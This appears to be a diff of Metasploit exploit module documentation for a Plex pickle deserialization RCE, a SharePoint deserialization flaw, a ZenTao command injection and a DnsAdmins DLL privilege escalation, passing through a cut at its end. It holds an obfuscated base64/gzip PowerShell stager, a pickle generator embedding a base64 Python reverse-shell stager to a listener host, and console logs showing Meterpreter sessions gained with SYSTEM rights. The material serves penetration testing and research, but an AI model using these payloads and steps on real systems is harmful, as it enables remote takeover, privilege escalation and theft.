-[*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 [+] Successfully executed command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
 [*] Sending stage (201283 bytes) to 172.16.249.169
 [*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.169:57257) at 2020-05-21 17:27:42 -0500
@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+This module exploits an authenticated Python unsafe `pickle.load` of a
+`Dict` file. An authenticated attacker can create a photo library and
+add arbitrary files to it. After setting the Windows only Plex
+variable `LocalAppDataPath` to the newly created photo library, a file
+named `Dict` will be unpickled, which causes an RCE as the user who
+started Plex.
+
+If an exploit fails, or is cancelled, `Dict` is
+left on disk, a new `ALBUM_NAME` will be required as subsuquent writes
+will make `Dict-1`, and not execute.
+
+A vulnerable version of the software can be downloaded from
+[uptodown.com](https://plex-media-server.en.uptodown.com/windows/versions),
+specifically [1.18.5.2309](https://plex-media-server.en.uptodown.com/windows/download/2177216)
+is vulnerable and used for developing the module.
+
+The plex server needs to be claimed by an account (free is ok), and the module `PLEX_TOKEN` option
+needs permission to create a library, and upload files to it.
+
+### Pickle Stub
+
+This exploit requires a python pickle file which can be generated with the following
+code:
+
+```
+import pickle
+
+class EP(object):
+    def __init__(self):
+        pass
+    def __reduce__(self):
+        # for generating an approximately correct size and content, we use
+        # msfvenom -p python/meterpreter/reverse_tcp LPORT=9999 LHOST=192.168.0.1
+        # that payload is then added after runsource.
+        # The original pre-meterp return would be
+        # return (eval, ("__import__('code').InteractiveInterpreter().runsource(, '<input>', 'exec')",))
+        return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMC4xJyw5OTk5KSkKCQlicmVhawoJZXhjZXB0OgoJCXRpbWUuc2xlZXAoNSkKbD1zdHJ1Y3QudW5wYWNrKCc+SScscy5yZWN2KDQpKVswXQpkPXMucmVjdihsKQp3aGlsZSBsZW4oZCk8bDoKCWQrPXMucmVjdihsLWxlbihkKSkKZXhlYyhkLHsncyc6c30pCg==')[0]))\", '<input>', 'exec')",))
+
+e = EP()
+pickle.dumps(e)
+```
+### Pickle Gotchas
+
+All the examples of Evil Pickle attacks seem to call one command/function.
+[1](https://github.com/fhightower/evil-pickle/blob/master/evil_pickle_writer.py#L17),
+[2](https://medium.com/@abhishek.dev.kumar.94/sour-pickle-insecure-deserialization-with-python-pickle-module-efa812c0d565),
+[3](https://blog.nelhage.com/2011/03/exploiting-pickle/),
+[4](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)
+
+However, @acammack-r7 suggested a way around this. using the `InteractiveInterpreter`.
+Credit to them for this original code:
+
+```
+>>> class Bad(object):
+...      def __reduce__(self):
+...              return (eval, ("__import__('code').InteractiveInterpreter().runsource(\"print('ok')\", '<input>', 'exec')",))
+... 
+>>> x = Bad()
+>>> s = pickle.dumps(x)
+>>> pickle.loads(s)
+ok
+False
+```
+
+## Verification Steps
+
+  1. Install the application on an internet-connected host
+  2. Complete configuration in the browser that pops up
+  3. Register/Connect it to a Plex account (Free or Plex Pass)
+  4. Start msfconsole
+  5. Do: ```use windows/http/plex_unpickle_dict_rce```
+  6. Do: ```run```
+  7. You should get a shell.
+
+## Options
+
+### ALBUM_NAME
+
+Name of the photo album to create.  Default is random 6 character.
+
+### LIBRARY_PATH
+
+The path to write the photo library to.  Must be valid.  Default is `C:\\Users\\Public`
+
+### PLEX_TOKEN
+
+The `X-Plex-Token` value from requests from an authenticated session.
+
+There are multiple ways to obtain this value.  The easiest is most likely opening the
+Console on your web browser (F12) and typing `window.localStorage.myPlexAccessToken`.
+However, it can also be obtained from
+[plex library files](https://support.plex.tv/articles/204059436-finding-an-authentication-token-x-plex-token/)
+or by following [this comment](https://github.com/rapid7/metasploit-framework/pull/13741#issuecomment-649076121)
+
+### REBOOT_SLEEP
+
+Amount of seconds to sleep waiting on the server to reboot.  In testing `10` seemed to be OK, default is `15`.
+
+## Scenarios
+
+### Plex 10.0.16299 on Windows 10 16299
+
+    ```
+    [*] Processing plex.rb for ERB directives.
+    resource (plex.rb)> use exploit/windows/http/plex_unpickle_dict_rce
+    resource (plex.rb)> set rhosts 2.2.2.2
+    rhosts => 2.2.2.2
+    resource (plex.rb)> set lhost 1.1.1.1
+    lhost => 1.1.1.1
+    resource (plex.rb)> set PLEX_TOKEN aa1g1aa3aaHbAtPBsEG7
+    PLEX_TOKEN => aa1g1aa3aaHbAtPBsEG7
+    resource (plex.rb)> set verbose true
+    verbose => true
+    msf5 exploit(windows/http/plex_unpickle_dict_rce) > exploit
+    
+    [*] Started reverse TCP handler on 1.1.1.1:4444
+    [*] Gathering Plex Config
+    [*] Server Name: EXPLOITABLE -win10
+    [+] Server OS: Windows (10.0 (Build 16299))
+    [+] Server Version: 1.18.5.2309-f5213a238
+    [+] Camera Upload: 1
+    [*] Using album name: TAtPGj
+    [*] Adding new photo library
+    [+] Created Photo Library: 163
+    [*] Adding pickled Dict to library
+    [*] Changing AppPath
+    [*] Restarting Plex
+    [*] Sending stage (53755 bytes) to 2.2.2.2
+    [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:51092) at 2020-07-03 14:13:08 -0400
+    [*] Sleeping 15 seconds for server restart
+    [*] Cleanup Phase: Reverting changes from exploitation
+    [*] Changing AppPath
+    [*] Restarting Plex
+    [*] Deleting Photo Library
+    
+    meterpreter > getuid
+    Server username: WIN10PROLICENSE\windows
+    meterpreter > sysinfo
+    Computer        : win10prolicensed
+    OS              : Windows 10 (Build 16299)
+    Architecture    : x64
+    System Language : en_US
+    Meterpreter     : python/windows
+    meterpreter > pwd
+    \\?\C:\Users\Public\TAtPGj\Plex Media Server\Plug-in Support\Data\com.plexapp.system
+    ```
@@ -0,0 +1,103 @@
+## Vulnerable Application
+A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker
+to execute code within the context of the SharePoint application service. The privileges in this execution context are
+determined by the account that is specified when SharePoint is installed and configured. The vulnerability is related to
+a failure to validate the source of XML input data, leading to an unsafe deserialization operation that can be triggered
+from a page that initializes either the `ContactLinksSuggestionsMicroView` type or a derivative of it. In a default
+configuration, a Domain User account is sufficient to access SharePoint and exploit this vulnerability.
+
+This module leverages the `/_layouts/15/quicklinks.aspx?Mode=Suggestion` endpoint that was confirmed to be vulnerable by
+[Soroush Dalili](https://twitter.com/irsdl). Alternative endpoints that instantiate the
+`ContactLinksSuggestionsMicroView` type may be used as well but are not supported by the module.
+
+### Configuring SharePoint
+Once SharePoint is installed, it needs to be configured with a site in order to be exploitable. The Central
+Administration web interface **is not vulnerable**. To configure SharePoint to be a stand alone server:
+
+1. Install Active Directory and promote the server to be a Domain Controller
+    1. Install the "Active Directory Domain Services" role
+    1. Promote the server to a Domain Controller in a new forest
+    1. Create a Domain User account for testing
+1. Install SQL Server Express
+1. Run the "SharePoint Products Configuration Wizard"
+    1. Use the SQL Server Express instances as the database server
+1. In the SharePoint "Central Administration" console web interface:
+    1. Verify that there is a web application under the "Manage web applications" page
+    1. Create a new "Site Collection" under the "Create site collections" page
+        1. Select the previously created web application
+        1. Set a Title
+        1. Use the default "Team Site" template
+        1. Set the "Primary Site Collection Administrator" to the Domain Administrator account
+
+## Verification Steps
+
+1. Install the application and ensure a page is accessible
+1. Start msfconsole
+1. Do: `use exploit/windows/http/sharepoint_data_deserialization`
+1. Set the `RHOSTS`, `USERNAME`, `PASSWORD` and `PAYLOAD` options
+1. Set any additional options as required by the previously selected payload
+1. Optionally set the `VHOST`, `SSL` and `DOMAIN` options as appropriate
+1. Run the exploit
+
+## Options
+
+## Scenarios
+
+### SharePoint 2016 on Server 2016
+
+```
+msf5 > use exploit/windows/http/sharepoint_data_deserialization 
+[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set RHOSTS 192.168.63.168
+RHOSTS => 192.168.63.168
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set RPORT 80
+RPORT => 80
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set SSL false
+[!] Changing the SSL option's value may require changing RPORT!
+SSL => false
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set VHOST ec2amaz-v2pri0v
+VHOST => ec2amaz-v2pri0v
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set USERNAME smcintyre
+USERNAME => smcintyre
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set PASSWORD Password1
+PASSWORD => Password1
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set DOMAIN SHRPNT
+DOMAIN => SHRPNT
+msf5 exploit(windows/http/sharepoint_data_deserialization) > set PAYLOAD windows/meterpreter/bind_tcp
+PAYLOAD => windows/meterpreter/bind_tcp
+msf5 exploit(windows/http/sharepoint_data_deserialization) > check
+[*] 192.168.63.168:80 - The service is running, but could not be validated. Received the quicklinks HTML form.
+msf5 exploit(windows/http/sharepoint_data_deserialization) > exploit
+
+[*] Executing automatic check (disable AutoCheck to override)
+[!] The service is running, but could not be validated. Received the quicklinks HTML form.
+[*] Command Stager progress -   7.42% done (7499/101079 bytes)
+[*] Command Stager progress -  14.84% done (14998/101079 bytes)
+[*] Command Stager progress -  22.26% done (22497/101079 bytes)
+[*] Command Stager progress -  29.68% done (29996/101079 bytes)
+[*] Command Stager progress -  37.09% done (37495/101079 bytes)
+[*] Command Stager progress -  44.51% done (44994/101079 bytes)
+[*] Command Stager progress -  51.93% done (52493/101079 bytes)
+[*] Command Stager progress -  59.35% done (59992/101079 bytes)
+[*] Command Stager progress -  66.77% done (67491/101079 bytes)
+[*] Command Stager progress -  74.19% done (74990/101079 bytes)
+[*] Command Stager progress -  81.61% done (82489/101079 bytes)
+[*] Command Stager progress -  89.03% done (89988/101079 bytes)
+[*] Command Stager progress -  96.45% done (97487/101079 bytes)
+[*] Command Stager progress - 100.00% done (101079/101079 bytes)
+[*] Started bind TCP handler against 192.168.63.168:4444
+[*] Sending stage (176195 bytes) to 192.168.63.168
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.63.168:4444) at 2020-07-29 11:45:13 -0400
+
+meterpreter > sysinfo
+Computer        : EC2AMAZ-V2PRI0V
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : SHRPNT
+Logged On Users : 19
+Meterpreter     : x86/windows
+meterpreter > getuid
+Server username: SHRPNT\Administrator
+meterpreter >
+```
@@ -0,0 +1,107 @@
+## Vulnerable Application
+This module exploits a command injection vulnerability in ZenTao Pro 8.8.2 and earlier versions in order to execute arbitrary commands with
+SYSTEM privileges.
+          
+The module first tries to obtain the ZenTao Pro version from /pro/user-login.html. If a vulnerable version is found,
+it attempts to authenticate to the ZenTao dashboard. It then tries to execute the payload by submitting fake repositories via
+the 'Repo Create' function that is accessible from the dashboard via CI>Repo.
+More precisely, the module sends HTTP POST requests to '/pro/repo-create.html' that inject commands in the vulnerable 'path'
+parameter which corresponds to the 'Client Path' input field.
+
+Valid credentials for a ZenTao admin account are required. This module has been successfully tested against ZenTao 8.8.1 and 8.8.2
+running on Windows 10 (XAMPP server).
+
+Vulnerable software for testing can be downloaded [here](https://www.zentao.pm/download.html)
+and [here](https://sourceforge.net/projects/zentao/).
+The easiest way to install the application is by downloading the 'One-Click Installation Package for Windows'.
+The package for ZenTao 8.8.2 is available [here](https://www.zentao.pm/download/scrum-tool-team-collaboration-ztp8.8.2-413.html).
+Installation is then just a matter of unzipping the package, launching the ZenTao Runner control panel via `Xampp\ start.exe`
+and finally configuring and starting the server from ZenTao Runner. Detailed instructions are available [here]
+(https://www.zentao.pm/book/zentaomanual/zentao-one-click-install-win-13.html).
+
+## Verification Steps
+1. Install the module as usual
+2. Start msfconsole
+3. Do: `use exploit/windows/http/zentao_pro_rce`
+4. Do: `set RHOSTS [IP]`
+5. Do: `set USERNAME [username for the ZenTao Pro account]`
+6. Do: `set PASSWORD [password for the ZenTao Pro account]`
+7. Do: `set payload [payload]`
+8. Do: `set LHOST [IP]`
+9. Do: `exploit`
+
+## Options
+### PASSWORD
+The password for the ZenTao Pro account to authenticate with. This option is required.
+### TARGETPATH
+The path on the target where commands will be executed. The default value is `C:\`.
+### TARGETURI
+The base path to ZenTao Pro. The default value is `/pro/`.
+### USERNAME
+The username for the ZenTao Pro account to authenticate with. This option is required.
+
+## Targets
+```
+Id  Name
+--  ----
+0   Windows (x86)
+1   Windows (x64)
+```
+
+## Scenarios
+### ZenTao 8.8.2 running on Windows 10 (XAMPP server)
+```
+msf5 exploit(windows/http/zentao_pro_rce) > show options
+
+Module options (exploit/windows/http/zentao_pro_rce):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   PASSWORD    zentao123        yes       Password to authenticate with
+   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS      192.168.9.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT       80               yes       The target port (TCP)
+   SRVHOST     0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT     8080             yes       The local port to listen on.
+   SSL         false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETPATH  C:\              yes       The path on the target where commands will be executed
+   TARGETURI   /pro/            yes       The base path to ZenTao
+   URIPATH                      no        The URI to use for this exploit (default is random)
+   USERNAME    admin            yes       Username to authenticate with
+   VHOST                        no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Windows (x64)
+
+
+msf5 exploit(windows/http/zentao_pro_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[+] Successfully authenticated to ZenTao 8.8.2.
+[*] Executing the payload...
+[*] Command Stager progress -  20.97% done (2049/9770 bytes)
+[*] Command Stager progress -  41.94% done (4098/9770 bytes)
+[*] Command Stager progress -  62.92% done (6147/9770 bytes)
+[*] Command Stager progress -  83.89% done (8196/9770 bytes)
+[*] Command Stager progress - 100.15% done (9785/9770 bytes)
+[*] Sending stage (201283 bytes) to 192.168.9.14
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.9.14:50506) at 2020-07-08 15:01:22 -0400
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+
+```
@@ -0,0 +1,348 @@
+## Vulnerable Application
+
+Windows Server 2003 and above
+
+#### Introduction
+This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
+`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at
+`HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\` named `ServerLevelPluginDll` that can be
+made to point to an arbitrary DLL. Restarting the DNS service will then result in the attacker's DLL
+being loaded and executed as the SYSTEM user, thereby granting the attacker SYSTEM privileges.
+
+Note that if the option to drop the DLL file on the host is selected (instead of the option to use a UNC path), there is a possibility
+that antivirus may detect the DLL file and remove it. In this case it will not be possible to restart the DNS service via the
+Service Manager without first clearing out the `ServerLevelPluginDll` value of the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\`
+key using an account with administrator privileges.
+
+To avoid the potential of this occurring, this module has a configurable option, `AVTIMEOUT`, which allows users to configure
+how long they would like to wait for any potential AV to pick up on the file after which the module will then check to
+ensure the dropped DLL file exists prior to creating the `ServerLevelPluginDll` value within the
+`HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\` key.
+
+It should also be noted that the UNC path option may run into a similar issue if an incorrect IP address is typed in, so users should
+be especially careful when setting the value of `DLLPATH` to ensure that they don't inadvertently set an incorrect IP address and thereby
+prevent the DNS server from being able to restart.
+
+This module has only been tested and confirmed to work on Windows Server 2019 Standard Edition, however it should work against any Windows
+Server version up to and including Windows Server 2019.
+
+### Setup Steps (Windows Server 2019 Standard)
+1. Install Windows Server 2019 Standard with GUI
+2. Install and configure Active Directory Domain Services and DNS services.
+3. Promote the server to a domain controller once the initial setup wizard is
+   complete. This will complete the setup of the AD.
+4. Reboot
+5. Add a new user which I called normal and set its password to a long string such as
+`thisIsADamnGoodPassword123!`. Don't use any other special characters or you may end up
+violating the default password policy.
+6. Add this new user to two groups: `DnsAdmins` (should have been created with the installation of
+the DNS server and the AD Server), and `Remote Desktop Users`.
+See https://www.snel.com/support/create-user-and-allow-rdp-permission-on-windows-server-2016/ for info
+on how to do this.
+7. To go `Group Policy Management -> Forest -> Domains -> *your domain name* -> Domain Controllers ->
+Default Domain Controllers Policy` and right click on it, then select Edit. From here select Policies ->
+Windows Settings -> Security Settings -> Local Policies -> User Right Managements and then select
+the Allow log on locally policy underneath this and double click on it. Ensure the Define these
+policy settings option is checked, and then select Add User or Group and add in the name of the
